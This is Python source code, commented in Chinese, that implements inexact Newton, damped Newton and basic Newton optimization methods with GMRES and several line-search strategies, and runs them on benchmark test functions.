function_k += 1
func_values.append(F)
start_time = time.time()
use_gmres = True
#计算下降方向d_k,这一步包括修正Hk,和计算dk = -Hk * gk
label .count_dk
#选择当前的eta
if g_pre is None:
eta = eta0
else:
if eta_mode == 1:
eta = np.linalg.norm(g - g_pre - G_pre @ d_pre) / np.linalg.norm(g_pre)
elif eta_mode == 2:
eta = gamma * (np.linalg.norm(g) / np.linalg.norm(g_pre)) ** sigma
# 安全保护
if eta_pre is not None and safeguard:
if eta_mode == 1:
if eta_pre ** ((1/math.sqrt(5))/2) > 0.1:
eta = max(eta, eta_pre ** ((1/math.sqrt(5))/2) )
elif eta_mode == 2:
if gamma * eta_pre ** sigma > 0.1:
eta = max(eta, gamma * eta_pre ** sigma)
#使用GMRES方法迭代求解dk
if use_gmres:
logger.info("eta is {}".format(eta))
gmres_result = gmres(G, -g, tol=eta)
logger.info("gmers reslut is {}".format(gmres_result))
d = gmres_result[0]
if np.all(d == 0) or use_gmres == False:
inv_hass = np.linalg.inv(G)
d = -np.dot(inv_hass , g)
use_gmres = False
# end_time = time.time()
# logger.info("迭代求解所得下降方向为0,{mode}的非精确牛顿法,迭代结束,迭代轮次{iter},函数调用次数{func_k},最终用时{time},最终X={X},最终函数值={func_X_new}".format(mode=search_mode, iter=k, func_k=function_k, time=end_time-start_time, X=X,func_X_new=func_X_new))
# return X, func_X_new, k, function_k, end_time-start_time
before_LS_time = time.time()
#求得下降方向之后,此后的步骤与其他优化方法无异
if search_mode == "ELS":
logger.info("迭代第{iter}轮,当前函数调用次数{func_k},当前用时{time},当前X取值为{X},当前g的取值为{g}, 下降方向为{d},当前函数值为{func_x}".format(iter=k,func_k=function_k,time=before_LS_time-start_time,X=X, g=g, d=d,func_x=round(F, 8)))
a, b, add_retreat_func = ELS.retreat_method(func, X, d, hyper_parameters=hyper_parameters["ELS"]["retreat_method"] if hyper_parameters is not None else None)
alpha_star, add_golden_func = ELS.golden_method(func, X, d, a, b, hyper_parameters=hyper_parameters["ELS"]["golden_method"] if hyper_parameters is not None else None)
add_func_k = add_retreat_func + add_golden_func
elif search_mode == "ILS":
logger.info("迭代第{iter}轮,当前函数调用次数{func_k},当前用时{time},当前X取值为{X},当前g的取值为{g}, 下降方向为{d},当前函数值为{func_x}".format(iter=k,func_k=function_k,time=before_LS_time-start_time,X=X, g=g, d=d,func_x=round(F, 8)))
alpha_star, add_func_k = ILS.inexact_line_search(func, gfunc, X, d, hyper_parameters=hyper_parameters["ILS"] if hyper_parameters is not None else None)
elif search_mode == "GLL":
logger.info("迭代第{iter}轮,当前函数调用次数{func_k},当前用时{time},当前X取值为{X},当前g的取值为{g}, 下降方向为{d},当前函数值为{func_x}".format(iter=k,func_k=function_k,time=before_LS_time-start_time,X=X, g=g, d=d,func_x=round(F, 8)))
alpha_star, add_func_k, mk = GLL_search(func, gfunc, X, d, func_values, mk, hyper_parameters=hyper_parameters["GLL"] if hyper_parameters is not None else None)
# 更新
logger.info("当前更新的步长为{}".format(alpha_star))
X_new = X + d * alpha_star
function_k = function_k + add_func_k + 1
func_X_new = func(X_new)
func_values.append(func_X_new)
g_pre = g
G_pre = G
d_pre = d
g = gfunc(X_new)
G = hess_func(X)
logging.info("g is {}".format(g))
logger.info("g的范数为{g},epsilon * max(1, |x_k|)为{xk}".format(g = np.linalg.norm(g), xk = epsilon * max(1, np.linalg.norm(X_new))))
# 给出的终止条件可能存在一些问题,由于编程语言进度的限制,g的下降量可能为0,从而计算 rho的时候可能存在除0的情况
if np.linalg.norm(g) < epsilon * max(1, np.linalg.norm(X_new)):
# if abs(func_X_new - F) <= epsilon:
end_time = time.time()
logger.info("因为满足终止条件,{mode}的非精确牛顿法,迭代结束,迭代轮次{iter},函数调用次数{func_k},最终用时{time},最终X={X},最终函数值={func_X_new}".format(mode=search_mode, iter=k, func_k=function_k, time=end_time-start_time, X=X,func_X_new=func_X_new))
return X_new, func_X_new, k, function_k, end_time-start_time
if k > max_epoch:
end_time = time.time()
logger.info("超过最大迭代次数,{mode}的非精确牛顿法,迭代结束,迭代轮次{iter},函数调用次数{func_k},最终用时{time},最终X={X},最终函数值={func_X_new}".format(mode=search_mode, iter=k, func_k=function_k, time=end_time-start_time, X=X,func_X_new=func_X_new))
return X_new, func_X_new, k, function_k, end_time-start_time
X = X_new
F = func_X_new
k += 1
goto .count_dk
@with_goto
def INBM(X, func, gfunc, hess_func, hyper_parameters=None, search_mode="ILS", eta_mode=1, safeguard=True, eta0=0.5, gamma=1, sigma=1.5, t=1e-4, eta_max=0.9, theta_min=0.1, theta_max=0.5, epsilon=1e-5, max_epoch=1000):
"""[summary]
Args:
X ([np.array]): [Input X]
func ([回调函数]): [目标函数]
gfunc ([回调函数]): [目标函数的一阶导函数]
hess_func ([回调函数]): [目标函数的Hessian矩阵]
hyper_parameters: (Dic): 超参数,超参数中包括:
search_mode (str, optional): [线搜索的模式(选择精确线搜索还是非精确线搜索)]. Defaults to 'ELS'. ['ELS', 'ILS']
eta_mode (int, optional): [{eta}选择的方式]. Defaults to 1. [1, 2]
eta0 ([float], optional): [eta的初值]. Defaults to 0.5.
gamma ([float], optional): [eta选择2当中的系数参数]. Defaults to 1.
sigma ([float], optional): [eta选择2当中的指数参数]. Defaults to 1.5.
safeguard ([bool], optional): [是否使用安全保护]. Defaults to True.
t ([float], optional): [线性方程组情况条件2中的t]. Defaults to 1e-4.
eta_max (float, optional): [eta 的上界]. Defaults to 0.9.
theta_min (float, optional): [theta的下界,在while循环中在theta的取值范围中通过二次插值取theta]. Defaults to 0.1.
theta_max (float, optional): [theta的上界,在while循环中在theta的取值范围中通过二次插值取theta]. Defaults to 0.5.
epsilon ([float], optional): [||g_k|| < 1e-5 * max(1, ||x_k||)时,迭代结束]. Defaults to 1e-8.
max_epoch (int, optional): [最大允许的迭代次数]. Defaults to 1000.
"""
if hyper_parameters is not None:
search_mode = hyper_parameters["search_mode"]
epsilon = hyper_parameters["epsilon"]
max_epoch = hyper_parameters["max_epoch"]
eta_mode = hyper_parameters["INBM"]["eta_mode"]
eta0 = hyper_parameters["INBM"]["eta0"]
safeguard = hyper_parameters["INBM"]["safeguard"]
t = hyper_parameters["INBM"]["t"]
eta_max = hyper_parameters["INBM"]["eta_max"]
theta_min = hyper_parameters["INBM"]["theta_min"]
theta_max = hyper_parameters["INBM"]["theta_max"]
if eta_mode == 2:
gamma = hyper_parameters["INBM"]["gamma"]
sigma = hyper_parameters["INBM"]["sigma"]
n = len(X)
k = 1
function_k = 0
func_values = [] # 记录每一步的函数值,在GLL中有用
mk = 0 # GLL当中的mk初始值
g_pre = None
G_pre = None
d_pre = None
g = gfunc(X)
G = hess_func(X)
eta_pre = None
# 把当前函数值加入func_values
F = func(X)
function_k += 1
func_values.append(F)
start_time = time.time()
use_gmres = True
#计算下降方向d_k,这一步包括修正Hk,和计算dk = -Hk * gk
label .count_dk
#选择当前的eta
if g_pre is None:
eta = eta0
else:
if eta_mode == 1:
eta = np.linalg.norm(g - g_pre - G_pre @ d_pre) / np.linalg.norm(g_pre)
elif eta_mode == 2:
eta = gamma * (np.linalg.norm(g) / np.linalg.norm(g_pre)) ** sigma
elif eta_mode == 0:
eta = eta0
# 安全保护
if eta_pre is not None and safeguard:
if eta_mode == 1:
if eta_pre ** ((1/math.sqrt(5))/2) > 0.1:
eta = max(eta, eta_pre ** ((1/math.sqrt(5))/2) )
elif eta_mode == 2:
if gamma * eta_pre ** sigma > 0.1:
eta = max(eta, gamma * eta_pre ** sigma)
#使用GMRES方法迭代求解dk
eta = min(eta, eta_max)
if use_gmres:
logger.info("eta is {}".format(eta))
gmres_result = gmres(G, -g, tol=eta)
logger.info("gmers reslut is {}".format(gmres_result))
d = gmres_result[0]
if np.all(d == 0) or use_gmres == False:
inv_hass = np.linalg.inv(G)
d = -np.dot(inv_hass , g)
use_gmres = False
# end_time = time.time()
# logger.info("迭代求解所得下降方向为0,{mode}的非精确牛顿法,迭代结束,迭代轮次{iter},函数调用次数{func_k},最终用时{time},最终X={X},最终函数值={func_X_new}".format(mode=search_mode, iter=k, func_k=function_k, time=end_time-start_time, X=X,func_X_new=func_X_new))
# return X, func_X_new, k, function_k, end_time-start_time
# 通过while循环来取得满足线性方程组情况条件2
while np.linalg.norm(gfunc(X + d)) > (1 - t * (1 - eta)) * np.linalg.norm(gfunc(X)):
denominator = (F ** 2 - func(X + d) ** 2 + 2 * F * (g @ d))
#防止可能存在的除0现象,先把theta置为1,以便触发之后的步骤if语句的判断,把theta置为给定的范围内的中点
if abs(denominator) < 1e-20:
theta = 1
else:
theta = (F * (g @ d)) / (F ** 2 - func(X + d) ** 2 + 2 * F * (g @ d))
if theta < theta_min or theta > theta_max: # 如果二次插值计算出的theta不在给定的范围内,则在给定的范围内取中点
theta = (theta_min + theta_max) / 2
d = theta * d
eta = 1 - theta * (1 - eta)
before_LS_time = time.time()
#求得下降方向之后,此后的步骤与其他优化方法无异
if search_mode == "ELS":
logger.info("迭代第{iter}轮,当前函数调用次数{func_k},当前用时{time},当前X取值为{X},当前g的取值为{g}, 下降方向为{d},当前函数值为{func_x}".format(iter=k,func_k=function_k,time=before_LS_time-start_time,X=X, g=g, d=d,func_x=round(F, 8)))
a, b, add_retreat_func = ELS.retreat_method(func, X, d, hyper_parameters=hyper_parameters["ELS"]["retreat_method"] if hyper_parameters is not None else None)
alpha_star, add_golden_func = ELS.golden_method(func, X, d, a, b, hyper_parameters=hyper_parameters["ELS"]["golden_method"] if hyper_parameters is not None else None)
add_func_k = add_retreat_func + add_golden_func
elif search_mode == "ILS":
logger.info("迭代第{iter}轮,当前函数调用次数{func_k},当前用时{time},当前X取值为{X},当前g的取值为{g}, 下降方向为{d},当前函数值为{func_x}".format(iter=k,func_k=function_k,time=before_LS_time-start_time,X=X, g=g, d=d,func_x=round(F, 8)))
alpha_star, add_func_k = ILS.inexact_line_search(func, gfunc, X, d, hyper_parameters=hyper_parameters["ILS"] if hyper_parameters is not None else None)
elif search_mode == "GLL":
logger.info("迭代第{iter}轮,当前函数调用次数{func_k},当前用时{time},当前X取值为{X},当前g的取值为{g}, 下降方向为{d},当前函数值为{func_x}".format(iter=k,func_k=function_k,time=before_LS_time-start_time,X=X, g=g, d=d,func_x=round(F, 8)))
alpha_star, add_func_k, mk = GLL_search(func, gfunc, X, d, func_values, mk, hyper_parameters=hyper_parameters["GLL"] if hyper_parameters is not None else None)
# 更新
logger.info("当前更新的步长为{}".format(alpha_star))
X_new = X + d * alpha_star
function_k = function_k + add_func_k + 1
func_X_new = func(X_new)
func_values.append(func_X_new)
g_pre = g
G_pre = G
d_pre = d
g = gfunc(X_new)
G = hess_func(X)
logging.info("g is {}".format(g))
logger.info("g的范数为{g},epsilon * max(1, |x_k|)为{xk}".format(g = np.linalg.norm(g), xk = epsilon * max(1, np.linalg.norm(X_new))))
# 给出的终止条件可能存在一些问题,由于编程语言进度的限制,g的下降量可能为0,从而计算 rho的时候可能存在除0的情况
if np.linalg.norm(g) < epsilon * max(1, np.linalg.norm(X_new)):
# if abs(func_X_new - F) <= epsilon:
end_time = time.time()
logger.info("因为满足终止条件,{mode}的非精确牛顿法,迭代结束,迭代轮次{iter},函数调用次数{func_k},最终用时{time},最终X={X},最终函数值={func_X_new}".format(mode=search_mode, iter=k, func_k=function_k, time=end_time-start_time, X=X,func_X_new=func_X_new))
return X_new, func_X_new, k, function_k, end_time-start_time
if k > max_epoch:
end_time = time.time()
logger.info("超过最大迭代次数,{mode}的非精确牛顿法,迭代结束,迭代轮次{iter},函数调用次数{func_k},最终用时{time},最终X={X},最终函数值={func_X_new}".format(mode=search_mode, iter=k, func_k=function_k, time=end_time-start_time, X=X,func_X_new=func_X_new))
return X_new, func_X_new, k, function_k, end_time-start_time
X = X_new
F = func_X_new
k += 1
goto .count_dk
if __name__ == '__main__':
CRITERION = ["Armijo Goldstein", "Wolfe Powell", "Strong Wolfe Powell"]
ILS_criterion = CRITERION[0]
ELS_INM_hyper_parameters = {
"ELS": {
"retreat_method": {
"a0" : 1,
"r": 1e-6,
"t": 1.5,
},
"golden_method": {
"epsilon": 1e-6,
}
},
"INM": {
"eta_mode": 1,
"eta0": 0.5,
"safeguard" : True,
"gamma" : 0.9,
"sigma" : (1 + math.sqrt(5)) / 2,
},
"modified_Cholesky": {
"u": 1e-50,
},
"search_mode": "ELS",
"epsilon": 1e-5,
"max_epoch": 10000,
}
ILS_INM_hyper_parameters = {
"ILS": {
"rho": 0.3,
"sigma": 0.5,
"t": 1.5,
"alpha0": 1,
"criterion": ILS_criterion
},
"GM_newton": {
"zeta": 1e-8,
},
"modified_Cholesky": {
"u": 1e-50,
},
"INM": {
"eta_mode": 1,
"eta0": 0.1,
"safeguard" : True,
"gamma" : 0.9,
"sigma" : (1 + math.sqrt(5)) / 2,
},
"search_mode": "ILS",
"epsilon": 1e-5,
"max_epoch": 10000,
}
GLL_INM_hyper_parameters = {
"GLL": {
"rho": 0.25,
"sigma": 0.4,
"M": 5,
"a": 10,
},
"modified_Cholesky": {
"u": 1e-50,
},
"INM": {
"eta_mode": 1,
"eta0": 1e-6,
"safeguard" : False,
"gamma" : 0.9,
"sigma" : (1 + math.sqrt(5)) / 2,
},
"search_mode": "GLL",
"epsilon": 1e-5,
"max_epoch": 10000,
}
ELS_INBM_hyper_parameters = {
"ELS": {
"retreat_method": {
"a0" : 1,
"r": 1e-8,
"t": 1.5,
},
"golden_method": {
"epsilon": 1e-8,
}
},
"INBM": {
"eta_mode": 1,
"eta0": 0.5,
"safeguard" : True,
"gamma" : 0.9,
"sigma" : (1 + math.sqrt(5)) / 2,
"t" : 1e-4,
"eta_max" : 0.9,
"theta_min" : 0.1,
"theta_max": 0.5,
},
"modified_Cholesky": {
"u": 1e-50,
},
"search_mode": "ELS",
"epsilon": 1e-5,
"max_epoch": 10000,
}
ILS_INBM_hyper_parameters = {
"ILS": {
"rho": 0.25,
"sigma": 0.33,
"t": 1.5,
"alpha0": 1,
"criterion": ILS_criterion
},
"GM_newton": {
"zeta": 1e-8,
},
"modified_Cholesky": {
"u": 1e-50,
},
"INBM": {
"eta_mode": 1,
"eta0": 0.1,
"safeguard" : True,
"gamma" : 0.9,
"sigma" : (1 + math.sqrt(5)) / 2,
"t" : 1e-4,
"eta_max" : 0.9,
"theta_min" : 0.1,
"theta_max": 0.5,
},
"search_mode": "ILS",
"epsilon": 1e-5,
"max_epoch": 10000,
}
GLL_INBM_hyper_parameters = {
"GLL": {
"rho": 0.25,
"sigma": 0.4,
"M": 5,
"a": 1,
},
"modified_Cholesky": {
"u": 1e-50,
},
"INBM": {
"eta_mode": 1,
"eta0": 0.5,
"safeguard" : True,
"gamma" : 0.9,
"sigma" : (1 + math.sqrt(5)) / 2,
"t" : 1e-4,
"eta_max" : 0.9,
"theta_min" : 0.1,
"theta_max": 0.5,
},
"search_mode": "GLL",
"epsilon": 1e-8,
"max_epoch": 10000,
}
N = 1000
for n in [N]:
# logger.info("Penalty1 函数")
# x0 = np.array(range(1, n + 1))
# penalty1 = functions.Penalty1(n)
# ILS_INM_hyper_parameters["INM"]["eta_mode"] = 1
# logger.info("非精确线搜索下的INM法")
# X_star, func_X_star, iter_num, function_num, cpu_time = inexact_newton_method(x0, penalty1.func, penalty1.gfunc, penalty1.hess_func, hyper_parameters=ILS_INM_hyper_parameters)
# logger.info("非精确牛顿法 & 选择1 & {} & {} & {} & {} & 是 \\\\".format(round(func_X_star, 5), iter_num, function_num, round(cpu_time, 2)))
# ILS_INM_hyper_parameters["INM"]["eta_mode"] = 2
# logger.info("非精确线搜索下的INM法")
# X_star, func_X_star, iter_num, function_num, cpu_time = inexact_newton_method(x0, penalty1.func, penalty1.gfunc, penalty1.hess_func, hyper_parameters=ILS_INM_hyper_parameters)
# logger.info("非精确牛顿法 & 选择2 & {} & {} & {} & {} & 是 \\\\".format(round(func_X_star, 5), iter_num, function_num, round(cpu_time, 2)))
# ILS_INBM_hyper_parameters["INBM"]["eta_mode"] = 1
# logger.info("非精确线搜索下的INBM法")
# X_star, func_X_star, iter_num, function_num, cpu_time = INBM(x0, penalty1.func, penalty1.gfunc, penalty1.hess_func, hyper_parameters=ILS_INBM_hyper_parameters)
# logger.info("非精确牛顿回溯法 & 选择1 & {} & {} & {} & {} & 是 \\\\".format(round(func_X_star, 5), iter_num, function_num, round(cpu_time, 2)))
# ILS_INBM_hyper_parameters["INBM"]["eta_mode"] = 2
# logger.info("非精确线搜索下的INBM法")
# X_star, func_X_star, iter_num, function_num, cpu_time = INBM(x0, penalty1.func, penalty1.gfunc, penalty1.hess_func, hyper_parameters=ILS_INBM_hyper_parameters)
# logger.info("非精确牛顿回溯法 & 选择2 & {} & {} & {} & {} & 是 \\\\".format(round(func_X_star, 5), iter_num, function_num, round(cpu_time, 2)))
logger.info("Extended_Freudenstein_Roth 函数")
x0 = np.array([-2.] * n)
EFR = functions.Extended_Freudenstein_Roth(n)
# ILS_INM_hyper_parameters["INM"]["eta_mode"] = 1
# logger.info("选择1下的INM法")
# X_star, func_X_star, iter_num, function_num, cpu_time = inexact_newton_method(x0, EFR.func, EFR.gfunc, EFR.hess_func, hyper_parameters=ILS_INM_hyper_parameters)
# logger.info("非精确牛顿法 & 选择1 & {} & {} & {} & {} & 是 \\\\".format(format(func_X_star, ".4e"), iter_num, function_num, round(cpu_time, 2)))
# ILS_INM_hyper_parameters["INM"]["eta_mode"] = 2
# logger.info("选择2下的INM法")
# X_star, func_X_star, iter_num, function_num, cpu_time = inexact_newton_method(x0, EFR.func, EFR.gfunc, EFR.hess_func, hyper_parameters=ILS_INM_hyper_parameters)
# logger.info("非精确牛顿法 & 选择2 & {} & {} & {} & {} & 是 \\\\".format(format(func_X_star, ".4e"), iter_num, function_num, round(cpu_time, 2)))
# ILS_INBM_hyper_parameters["INBM"]["eta_mode"] = 1
# logger.info("选择1下的INBM法")
# X_star, func_X_star, iter_num, function_num, cpu_time = INBM(x0, EFR.func, EFR.gfunc, EFR.hess_func, hyper_parameters=ILS_INBM_hyper_parameters)
# logger.info("非精确牛顿回溯法 & 选择1 & {} & {} & {} & {} & 是 \\\\".format(format(func_X_star, ".4e"), iter_num, function_num, round(cpu_time, 2)))
ILS_INBM_hyper_parameters["INBM"]["eta_mode"] = 2
logger.info("选择2下的INBM法")
X_star, func_X_star, iter_num, function_num, cpu_time = INBM(x0, EFR.func, EFR.gfunc, EFR.hess_func, hyper_parameters=ILS_INBM_hyper_parameters)
logger.info("非精确牛顿回溯法 & 选择2 & {} & {} & {} & {} & 是 \\\\".format(format(func_X_star, ".4e"), iter_num, function_num, round(cpu_time, 2)))
# logger.info("GLL线搜索下的INBM法")
# X_star, func_X_star, iter_num, function_num, cpu_time = INBM(x0, EFR.func, EFR.gfunc, EFR.hess_func, hyper_parameters=GLL_INBM_hyper_parameters)
# logger.info("Extended_Rosenbrock 函数")
# ER = functions.Extended_Rosenbrock(n)
# x0 = np.zeros(n)
# t = np.array(range(int(n / 2)))
# x0[2 * t] = -1.2
# x0[2 * t + 1] = 1
# ILS_INM_hyper_parameters["INM"]["eta_mode"] = 1
# logger.info("选择1下的INM法")
# X_star, func_X_star, iter_num, function_num, cpu_time = inexact_newton_method(x0, ER.func, ER.gfunc, ER.hess_func, hyper_parameters=ILS_INM_hyper_parameters)
# logger.info("非精确牛顿法 & 选择1 & {} & {} & {} & {} & 是 \\\\".format(format(func_X_star, ".4e"), iter_num, function_num, round(cpu_time, 2)))
# ILS_INM_hyper_parameters["INM"]["eta_mode"] = 2
# logger.info("选择2下的INM法")
# X_star, func_X_star, iter_num, function_num, cpu_time = inexact_newton_method(x0, ER.func, ER.gfunc, ER.hess_func, hyper_parameters=ILS_INM_hyper_parameters)
# logger.info("非精确牛顿法 & 选择2 & {} & {} & {} & {} & 是 \\\\".format(format(func_X_star, ".4e"), iter_num, function_num, round(cpu_time, 2)))
# ILS_INBM_hyper_parameters["INBM"]["eta_mode"] = 1
# logger.info("选择1下的INBM法")
# X_star, func_X_star, iter_num, function_num, cpu_time = INBM(x0, ER.func, ER.gfunc, ER.hess_func, hyper_parameters=ILS_INBM_hyper_parameters)
# logger.info("非精确牛顿回溯法 & 选择1 & {} & {} & {} & {} & 是 \\\\".format(format(func_X_star, ".4e"), iter_num, function_num, round(cpu_time, 2)))
# ILS_INBM_hyper_parameters["INBM"]["eta_mode"] = 2
# logger.info("选择2下的INBM法")
# X_star, func_X_star, iter_num, function_num, cpu_time = INBM(x0, ER.func, ER.gfunc, ER.hess_func, hyper_parameters=ILS_INBM_hyper_parameters)
# logger.info("非精确牛顿回溯法 & 选择2 & {} & {} & {} & {} & 是 \\\\".format(format(func_X_star, ".4e"), iter_num, function_num, round(cpu_time, 2)))
# x0 = np.array([1/n] * int(n))
# f_funciton = functions.trigonometric
# g_function = functions.g_trigonometric
# G_function = functions.G_trigonometric
# logger.info("非精确线搜索下的INM法")
# X_star, func_X_star, iter_num, function_num, cpu_time = inexact_newton_method(x0, f_funciton, g_function, G_function, hyper_parameters=ILS_INM_hyper_parameters)
# logger.info("非精确牛顿法 & 选择2 & {} & {} & {} & {} & 是 \\\\".format(format(func_X_star, ".4e"), iter_num, function_num, round(cpu_time, 2)))
# logger.info("GLL线搜索下的INBM法")
# X_star, func_X_star, iter_num, function_num, cpu_time = inexact_newton_method(x0, f_funciton, g_function, G_function, hyper_parameters=GLL_INM_hyper_parameters)
# logger.info("非精确牛顿法 & GLL & {} & {} & {} & {} & 是 \\\\".format(format(func_X_star, ".4e"), iter_num, function_num, round(cpu_time, 2)))
# logger.info("精确线搜索下的INBM法")
# X_star, func_X_star, iter_num, function_num, cpu_time = INBM(x0, f_funciton, g_function, G_function, hyper_parameters=ELS_INBM_hyper_parameters)
# logger.info("非精确牛顿回溯法 & ELS & {} & {} & {} & {} & 是 \\\\".format(format(func_X_star, ".4e"), iter_num, function_num, round(cpu_time, 2)))
# logger.info("非精确线搜索下的INBM法")
# X_star, func_X_star, iter_num, function_num, cpu_time = INBM(x0, f_funciton, g_function, G_function, hyper_parameters=ILS_INBM_hyper_parameters)
# logger.info("非精确牛顿回溯法 & 选择1 & {} & {} & {} & {} & 是 \\\\".format(format(func_X_star, ".4e"), iter_num, function_num, round(cpu_time, 2)))
# logger.info("GLL线搜索下的INBM法")
# X_star, func_X_star, iter_num, function_num, cpu_time = INBM(x0, f_funciton, g_function, G_function, hyper_parameters=GLL_INBM_hyper_parameters)
# logger.info("非精确牛顿回溯法 & GLL & {} & {} & {} & {} & 是 \\\\".format(format(func_X_star, ".4e"), iter_num, function_num, round(cpu_time, 2)))
--- FILE SEPARATOR ---
import functions
import numpy as np
from goto import with_goto
import Line_Search.exact_line_search as ELS
import Line_Search.inexact_line_search as ILS
from Line_Search.GLL import GLL_search
import utils
import functools
import copy
import logging
logging.basicConfig(format='%(asctime)s,%(msecs)d %(levelname)-8s [%(filename)s:%(lineno)d] %(message)s',
datefmt='%d-%m-%Y:%H:%M:%S')
logging.getLogger().setLevel(logging.DEBUG)
logger = logging.getLogger(__name__)
@with_goto
def basic_newton(X, func, gfunc, hess_func, hyper_parameters=None, search_mode="ELS", use_modified_Cholesky=True, epsilon=1e-5, max_epoch=1000):
"""[使用基本牛顿法极小值点
d = -G_k^{-1} * g_k]
Args:
X ([np.array]): [Input X]
func ([回调函数]): [目标函数]
gfunc ([回调函数]): [目标函数的一阶导函数]
hess_func ([回调函数]): [目标函数的Hessian矩阵]
hyper_parameters: (Dic): 超参数,超参数中包括:
search_mode (str, optional): [线搜索的模式(选择精确线搜索还是非精确线搜索)]. Defaults to 'ELS'. ['ELS', 'ILS']
epsilon ([float], optional): [当函数值下降小于epsilon,迭代结束]. Defaults to 1e-5.
max_epoch (int, optional): [最大允许的迭代次数]. Defaults to 1000.
Returns:
返回求解得到的极小值点,极小值点对应的函数值和迭代次数
"""
if hyper_parameters is not None:
search_mode = hyper_parameters["search_mode"]
epsilon = hyper_parameters["epsilon"]
max_epoch = hyper_parameters["max_epoch"]
use_modified_Cholesky = hyper_parameters["damp_newton"]["use_modified_Cholesky"]
k = 1
function_k = 0 #函数调用次数
func_values = [] #记录每一步的函数值,在GLL中有用
mk = 0 #GLL当中的mk初始值
#计算下降方向d_k
label .count_dk
G = hess_func(X)
g = gfunc(X)
# 把当前函数值加入func_values
F = func(X)
function_k += 1
func_values.append(F)
try:
if use_modified_Cholesky:
L, D = utils.modified_Cholesky(G, hyper_parameters["modified_Cholesky"])
G_ = utils.get_modified_G(L, D)
inv_hass = np.linalg.inv(G_)
d = -np.dot(inv_hass , g)
else:
inv_hass = np.linalg.inv(G)
d = -np.dot(inv_hass , g)
except:
logger.info("Hessian 矩阵不可逆,用修正Cholesky分解求下降方向")
L, D = utils.modified_Cholesky(G, hyper_parameters["modified_Cholesky"])
G_ = utils.get_modified_G(L, D)
inv_hass = np.linalg.inv(G_)
d = -np.dot(inv_hass , g)
#基本牛顿法无需计算步长
X_new = X + d
function_k = function_k + 1
func_X_new = func(X_new)
if abs(func_X_new - F) <= epsilon:
logger.info("因为函数值下降在{epsilon}以内,基本牛顿法,迭代结束,迭代轮次{iter},函数调用次数{func_k},最终X={X},最终函数值={func_X_new}".format(epsilon=epsilon, mode=search_mode, iter=k, func_k=function_k, X=X,func_X_new=func_X_new))
return X_new, func_X_new, k, function_k
if k > max_epoch:
raise Exception("超过最大迭代次数:%d", max_epoch)
X = X_new
k += 1
goto .count_dk
@with_goto
def damp_newton(X, func, gfunc, hess_func, hyper_parameters=None, search_mode="ELS", use_modified_Cholesky=True, epsilon=1e-5, max_epoch=1000):
"""[使用阻尼牛顿法极小值点
d = -G_k^{-1} * g_k]
Args:
X ([np.array]): [Input X]
func ([回调函数]): [目标函数]
gfunc ([回调函数]): [目标函数的一阶导函数]
hess_func ([回调函数]): [目标函数的Hessian矩阵]
hyper_parameters: (Dic): 超参数,超参数中包括:
search_mode (str, optional): [线搜索的模式(选择精确线搜索还是非精确线搜索)]. Defaults to 'ELS'. ['ELS', 'ILS']
epsilon ([float], optional): [当函数值下降小于epsilon,迭代结束]. Defaults to 1e-5.
max_epoch (int, optional): [最大允许的迭代次数]. Defaults to 1000.
Returns:
返回求解得到的极小值点,极小值点对应的函数值和迭代次数
"""
if hyper_parameters is not None:
search_mode = hyper_parameters["search_mode"]
epsilon = hyper_parameters["epsilon"]
max_epoch = hyper_parameters["max_epoch"]
use_modified_Cholesky = hyper_parameters["damp_newton"]["use_modified_Cholesky"]
k = 1
function_k = 0 #函数调用次数
func_values = [] #记录每一步的函数值,在GLL中有用
mk = 0 #GLL当中的mk初始值
#计算下降方向d_k
label .count_dk
G = hess_func(X)
g = gfunc(X)
# 把当前函数值加入func_values
F = func(X)
function_k += 1
func_values.append(F)
try:
if use_modified_Cholesky:
L, D = utils.modified_Cholesky(G, hyper_parameters["modified_Cholesky"])
G_ = utils.get_modified_G(L, D)
inv_hass = np.linalg.inv(G_)
d = -np.dot(inv_hass , g)
else:
inv_hass = np.linalg.inv(G)
d = -np.dot(inv_hass , g)
except:
logger.info("Hessian 矩阵不可逆,用修正Cholesky分解求下降方向")
L, D = utils.modified_Cholesky(G, hyper_parameters["modified_Cholesky"])
G_ = utils.get_modified_G(L, D)
inv_hass = np.linalg.inv(G_)
d = -np.dot(inv_hass , g)
#计算步长
if search_mode == "ELS":
logger.info("迭代第{iter}轮,当前函数调用次数{func_k},当前X取值为{X},下降方向为{d},当前函数值为{func_x}".format(iter=k,func_k=function_k,X=X,d=d,func_x=round(F, 8)))
a, b, add_retreat_func = ELS.retreat_method(func, X, d, hyper_parameters=hyper_parameters["ELS"]["retreat_method"] if hyper_parameters is not None else None)
alpha_star, add_golden_func = ELS.golden_method(func, X, d, a, b, hyper_parameters=hyper_parameters["ELS"]["golden_method"] if hyper_parameters is not None else None)
add_func_k = add_retreat_func + add_golden_func
elif search_mode == "ILS":
logger.info("迭代第{iter}轮,当前函数调用次数{func_k},当前X取值为{X},下降方向为{d},当前函数值为{func_x}".format(iter=k,func_k=function_k,X=X,d=d,func_x=round(F, 8)))
alpha_star, add_func_k = ILS.inexact_line_search(func, gfunc, X, d, hyper_parameters=hyper_parameters["ILS"] if hyper_parameters is not None else None)
elif search_mode == "GLL":
logger.info("迭代第{iter}轮,当前函数调用次数{func_k},当前X取值为{X},下降方向为{d},当前函数值为{func_x}".format(iter=k,func_k=function_k,X=X,d=d,func_x=round(F, 8)))
alpha_star, add_func_k, mk = GLL_search(func, gfunc, X, d, func_values, mk, hyper_parameters=hyper_parameters["GLL"] if hyper_parameters is not None else None)
else:
raise ValueError("参数search_mode 必须从['ELS', 'ILS']当中选择")
X_new = X + d * alpha_star
function_k = function_k + add_func_k + 1
func_X_new = func(X_new)
if abs(func_X_new - F) <= epsilon:
logger.info("因为函数值下降在{epsilon}以内,{mode}的阻尼牛顿法,迭代结束,迭代轮次{iter},函数调用次数{func_k},最终X={X},最终函数值={func_X_new}".format(epsilon=epsilon, mode=search_mode, iter=k, func_k=function_k, X=X,func_X_new=func_X_new))
return X_new, func_X_new, k, function_k
if k > max_epoch:
logger.info("超过最大迭代次数:%d", max_epoch)
return X_new, func_X_new, k, function_k
X = X_new
k += 1
goto .count_dk
def negative_curvature(LT, D, E):
"""计算负曲率方向
Args:
LT ([np.array]]): LT矩阵
D ([np.array]): D 对角矩阵
E ([np.array]): E 对角矩阵, 由 modified_G - G 得到
Returns:
[np.array]: [输出负曲率方向],可能不存在,输出None
"""
n = len(D)
# 步1
psi = np.zeros(n)
for i in range(n):
psi[i] = D[i][i] - E[i][i]
# 步2
t = np.where(psi==np.min(psi))[0]
# logger.info("t is {}".format(t))
# logger.info("psi[t] is {}".format(psi[t]))
# 步3
if np.all(psi[t] >= 0):
return None
else:
pt = np.zeros(n)
